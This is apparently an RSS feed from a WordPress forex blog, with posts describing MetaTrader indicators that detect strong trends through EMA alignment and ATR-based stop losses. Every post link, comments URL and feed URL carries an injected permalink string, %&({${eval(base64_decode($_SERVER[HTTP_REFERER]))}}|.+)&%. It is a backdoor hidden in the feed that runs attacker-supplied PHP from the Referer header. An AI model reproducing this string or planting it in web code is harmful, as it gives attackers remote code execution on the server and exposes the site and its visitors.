<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Forex Abyss &#187; Admin</title>
	<atom:link href="http://www.forexabyss.com/category/admin/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.forexabyss.com</link>
	<description>Intellectual depths of Forex trading</description>
	<lastBuildDate>Sun, 24 Jan 2010 07:35:46 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Detecting extremely strong trends</title>
		<link>http://www.forexabyss.com/2009/03/02/detecting-extremely-strong-trends/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://www.forexabyss.com/2009/03/02/detecting-extremely-strong-trends/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 03:30:08 +0000</pubDate>
		<dc:creator>Lukasz</dc:creator>
				<category><![CDATA[Admin]]></category>
		<category><![CDATA[technical indicator]]></category>

		<guid isPermaLink="false">http://www.forexabyss.com/?p=70</guid>
		<description><![CDATA[I wrote an another indicator for Meta Trader for detecting extremely strong trends, that are supported by institutional traders. The indicator is based on the FX-Ed Trend technique described in the previously mentioned book Forex Patterns &#38; Probabilities: Trading Strategies for Trending &#38; Range-Bound Markets by Ed Ponsi. The technique makes use of a fact, that [...]]]></description>
			<content:encoded><![CDATA[<p>I wrote an another indicator for Meta Trader for detecting extremely strong trends, that are supported by institutional traders. The indicator is based on the FX-Ed Trend technique described in the previously mentioned book <em>Forex Patterns &amp; Probabilities: Trading Strategies for Trending &amp; Range-Bound Markets</em> by Ed Ponsi. The technique makes use of a fact, that institutional traders are known to create support and resistance at the 10-day EMA. <span style="text-decoration: underline;">The indicator is intended to be used, and works only on a daily timeframe.</span></p>
<p>Strong trends are detected by checking if exponential moving averages are aligned in the proper order (as discussed in my <span style="color: #000000; text-decoration: none;"><a href="http://www.forexabyss.com/?p=11">other</a></span> post), and the 10-day EMA acts as a support (for an uptrend) or resistance (for a downtrend) for a period of at least certain number of bars (specified by the external variable <em>signalMinBars</em>). It is 10 by default (as suggested by the author), but it can be changed. I have been experimenting with less restrictive filter (i.e. when the number of required bars is less than 10).</p>
<p>Uptrend conditions:</p>
<p>1. EMA(10) &gt; EMA(20) &gt; EMA(50) &gt; EMA(200)</p>
<p>2. FOR each i = 0..signalMinBars &#8211; 1: Low[i] &gt; EMA(10, i)</p>
<p>Downtrend conditions:</p>
<p>1. EMA(10) &lt; EMA(20) &lt; EMA(50) &lt; EMA(200)</p>
<p>2. FOR each i = 0..signalMinBars &#8211; 1: High[i] &lt; EMA(10, i)</p>
<p>where <em>Low[i]</em> and <em>High[i]</em> denote the lowest and highest prices of the bar <em>i</em>, and <em>EMA(10, i)</em> is the value of the 10-day EMA calculated for the same bar.</p>
<p>Once such trend is detected, a trade opportunity to buy or sell comes when the price falls to, or rises towards its 10-day EMA.</p>
<p>For every bar that satisfies either group of conditions, little arrow is shown pointing upward or downward depending on the trend direction. In addition, a bigger arrow is shown in the upper left corner that corresponds to conditions calculated for the current (zero) bar (see Fig. 1-3 below).</p>
<p>The indicator also shows a stop loss level for every bar (orange dots), either below or above the 10-day EMA (depending on the trend direction). The stop loss is based on volatility and calculated using the the following formulas:</p>
<p>EMA(10) &#8211; ATR(14, i) / 2 (for an uptrend)</p>
<p>EMA(10) + ATR(14, i)<em> / 2</em> (for a downtrend)</p>
<p>where <em>ATR(14, i)</em> is the 14-period average true range calculated for the bar<em> i</em>, that is either substracted from or added to the 10-day EMA.</p>
<p>According to the above technique, the stop loss level should be updated when the current candle closes. The stop loss level shown by the indicator is intended to be used to determine the stop loss placement when opening a new position (using the stop loss level that corresponds to the zero bar), and also when updating the stop loss for the existing position &#8211; at the time when the current candle closes (using the stop loss level that corresponds to the closed candle).</p>
<p>Since the indicator (unlike a Meta Trader&#8217;s expert advisor) has no knowledge about when (or if) a position is opened, calculation of the stop loss level for the given bar doesn&#8217;t take this fact into consideration. This is the reason for which the stop loss level shown by the indicator sometimes may appear to be lowered in an uptrend or moved higher in a downtrend. <span style="text-decoration: underline;">It is important to remember that o</span><span style="text-decoration: underline;">nce a position has been opened, the stop loss level should be updated in the direction of the open position only, i.e. it should never be lowered for a long position or raised for a short <span style="text-decoration: none;">postion.</span></span></p>
<p>The following (Fig. 1) is an example of  a very strong downtrend being detected on a daily EUR/USD chart (<em>signalMinBars</em> is 10):</p>
<div id="attachment_108" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-daily.gif"><img class="size-medium wp-image-108" title="mastrongtrendetector-eurusd-daily" src="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-daily-300x184.gif" alt="MAStrongTrendDetector on a daily EUR/USD chart" width="300" height="184" /></a><p class="wp-caption-text">Fig. 1. MAStrongTrendDetector on a daily EUR/USD chart</p></div>
<p>The downtrend was detected 3 times (see 3 little arrows pointing downward). There are a few possible entry points shown for illustrative purposes. The first entry has quickly become unprofitable (with a 101 pips loss &#8211; assuming that a short position was entered exactly when the price touched the 10-day EMA). However, if a short position was entered at the 10-day EMA, just after the third time the downtrend has been detected (one bar after the third arrow), it would give a total profit of 600 pips 12 days later (1.3708 &#8211; 1.3108 = 0.0600).</p>
<p>Fig. 2 shows the same chart where <em>signalMinBars</em> was reduced to 5, and as a result more signals were given.</p>
<div id="attachment_113" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-daily-2.gif"><img class="size-medium wp-image-113" title="mastrongtrendetector-eurusd-daily-2" src="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-daily-2-300x184.gif" alt="MAStrongTrendDetector on a daily EUR/USD chart" width="300" height="184" /></a><p class="wp-caption-text">Fig. 2. MAStrongTrendDetector on a daily EUR/USD chart</p></div>
<p>Fig. 3 shows a situation, where a strong downtrend has been detected for the current (zero) bar (<em>signalMinBars</em> is 1). Notice a bigger arrow in the upper left corner pointing downward.</p>
<div id="attachment_119" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-daily-3.gif"><img class="size-medium wp-image-119" title="mastrongtrendetector-eurusd-daily-3" src="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-daily-3-300x184.gif" alt="MAStrongTrendDetector on a daily EUR/USD chart" width="300" height="184" /></a><p class="wp-caption-text">Fig. 3. MAStrongTrendDetector on a daily EUR/USD chart</p></div>
<p>Finally, another example (Fig. 4) illustrates that the indicator only works on a daily timeframe, where institutional traders are known to create support or resistance at the 10-day EMA.</p>
<div id="attachment_115" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-h4.gif"><img class="size-medium wp-image-115" title="mastrongtrendetector-eurusd-h4" src="http://www.forexabyss.com/wordpress/wp-content/uploads/mastrongtrendetector-eurusd-h4-300x184.gif" alt="MAStrongTrendDetector on a 4-hour EUR/USD chart" width="300" height="184" /></a><p class="wp-caption-text">Fig. 4. MAStrongTrendDetector on a 4-hour EUR/USD chart</p></div>
<p>The source code of the indicator is available <a title="MAStrongTrendDetector.mq4" href="http://www.forexabyss.com/wordpress/wp-content/uploads/indicators/MAStrongTrendDetector.mq4">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.forexabyss.com/2009/03/02/detecting-extremely-strong-trends/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Trend detection using moving averages</title>
		<link>http://www.forexabyss.com/2009/02/12/trend-detection-using-moving-averages/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://www.forexabyss.com/2009/02/12/trend-detection-using-moving-averages/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 13 Feb 2009 03:40:49 +0000</pubDate>
		<dc:creator>Lukasz</dc:creator>
				<category><![CDATA[Admin]]></category>
		<category><![CDATA[technical indicator]]></category>

		<guid isPermaLink="false">http://www.forexabyss.com/?p=11</guid>
		<description><![CDATA[Recently, I have been experimenting with a trend detection technique based on moving averages. I read about it in a book Forex Patterns &#38; Probabilities: Trading Strategies for Trending &#38; Range-Bound Markets by Ed Ponsi, which I highly recommend. The technique attempts to detect a trend (either an uptrend or downtrend) by checking if exponential [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">Recently, I have been experimenting with a trend detection technique based on moving averages. I read about it in a book <em>Forex Patterns &amp; Probabilities: Trading Strategies for Trending &amp; Range-Bound Markets</em> by Ed Ponsi, which I highly recommend. The technique attempts to detect a trend (either an uptrend or downtrend) by checking if exponential moving averages are aligned in the &#8220;proper order&#8221;, as determined by the following conditions:</p>
<p style="text-align: left;">
<p style="text-align: left; padding-left: 30px;">EMA(10) &gt; EMA(20) &gt; EMA(50) &gt; EMA(200) (for an uptrend)</p>
<p style="text-align: left; padding-left: 30px;">EMA(10) &lt; EMA(20) &lt; EMA(50) &lt; EMA(200) (for a downtrend)</p>
<p>I wrote an indicator for Meta Trader that visualizes this method. The above conditions are calculated for every bar in a chart, and if a trend is detected little arrows are shown pointing either upward or downward depending on the trend direction (as shown in Fig. 1 and Fig. 2 below). In addition, a bigger arrow or &#8220;No Trend&#8221; text is shown in the upper left corner that corresponds to conditions calculated for the current (zero) bar.</p>
<p>The following is an example of a downtrend detected on a daily USD/GBP chart:</p>
<div id="attachment_28" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/matrenddetector-gbpusd-daily.gif"><img class="size-medium wp-image-28" title="matrenddetector-gbpusd-daily" src="http://www.forexabyss.com/wordpress/wp-content/uploads/matrenddetector-gbpusd-daily-300x206.gif" alt="MATrendDetector indicator on a daily GBP/USD chart" width="300" height="206" /></a><p class="wp-caption-text">Fig. 1. MATrendDetector indicator on a daily GBP/USD chart</p></div>
<p>Another example illustrates how the indicator looks like when there is no trend detected for the current (zero) bar (&#8220;No Trend&#8221; is displayed in the upper left corner). The indicator also shows periods of an uptrend and downtrend that occured in the past.</p>
<div id="attachment_64" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/matrenddetector-nzdjpy-h4.gif"><img class="size-medium wp-image-64" title="matrenddetector-nzdjpy-h4" src="http://www.forexabyss.com/wordpress/wp-content/uploads/matrenddetector-nzdjpy-h4-300x206.gif" alt="MATrendDetector on a 4-hour NZD/JPY chart" width="300" height="206" /></a><p class="wp-caption-text">Fig. 2. MATrendDetector on a 4-hour NZD/JPY chart</p></div>
<p>To better visualize this concept, below is the same chart as in Fig. 2. overlayed with moving averages used to calculate the indicator.</p>
<div id="attachment_66" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.forexabyss.com/wordpress/wp-content/uploads/matrenddetector-nzdjpy-h4-2.gif"><img class="size-medium wp-image-66" title="matrenddetector-nzdjpy-h4-2" src="http://www.forexabyss.com/wordpress/wp-content/uploads/matrenddetector-nzdjpy-h4-2-300x206.gif" alt="MATrendDetector on a 4-hour NZD/JPY chart overlayed with moving averages" width="300" height="206" /></a><p class="wp-caption-text">Fig. 3. MATrendDetector on a 4-hour NZD/JPY chart overlayed with moving averages</p></div>
<p>I found this trend detection method to be very useful, and the visualization of it helped me better understand the nature of trends in Forex.</p>
<p>If you want to try it yourself, the source code of the indicator is available <a title="MATrendDetector.mq4" href="http://www.forexabyss.com/wordpress/wp-content/uploads/indicators/MATrendDetector.mq4">here</a>. Your thoughts and comments are very welcome.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.forexabyss.com/2009/02/12/trend-detection-using-moving-averages/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Welcome to Forex Abyss!</title>
		<link>http://www.forexabyss.com/2008/11/26/welcome-to-forex-abyss/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://www.forexabyss.com/2008/11/26/welcome-to-forex-abyss/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Thu, 27 Nov 2008 02:05:00 +0000</pubDate>
		<dc:creator>Lukasz</dc:creator>
				<category><![CDATA[Admin]]></category>

		<guid isPermaLink="false">http://www.forexabyss.com/?p=3</guid>
		<description><![CDATA[This blog is dedicated to share information about Forex trading. It is a place to discuss trading strategies, technical indicators, Forex brokers, software and books.
]]></description>
			<content:encoded><![CDATA[<p>This blog is dedicated to share information about Forex trading. It is a place to discuss trading strategies, technical indicators, Forex brokers, software and books.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.forexabyss.com/2008/11/26/welcome-to-forex-abyss/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
